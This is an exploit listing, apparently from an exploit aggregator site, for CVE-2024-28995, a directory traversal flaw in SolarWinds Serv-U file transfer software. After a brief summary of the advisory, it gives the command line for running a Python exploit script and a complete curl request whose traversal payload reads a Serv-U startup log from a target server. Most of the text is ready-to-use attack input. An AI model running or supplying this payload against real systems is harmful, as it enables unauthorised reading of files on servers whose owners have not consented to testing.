Share
## https://sploitus.com/exploit?id=A5677283-7A4F-5582-B568-CED97ABE7445
## Exploit For CVE-2024-28995

On June 5, 2024, SolarWinds published an advisory for CVE-2024-28995, a high-severity directory traversal vulnerability affecting their file transfer solution Serv-U. The vulnerability was discovered by researcher Hussein Daher of Web Immunify.

### Using exploit
```
python3 CVE-2024-28995.py -t http://example.com/ -f somefile
```

### Using Curl
```
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"
```

Refrence:
- https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/CVE-2024-28995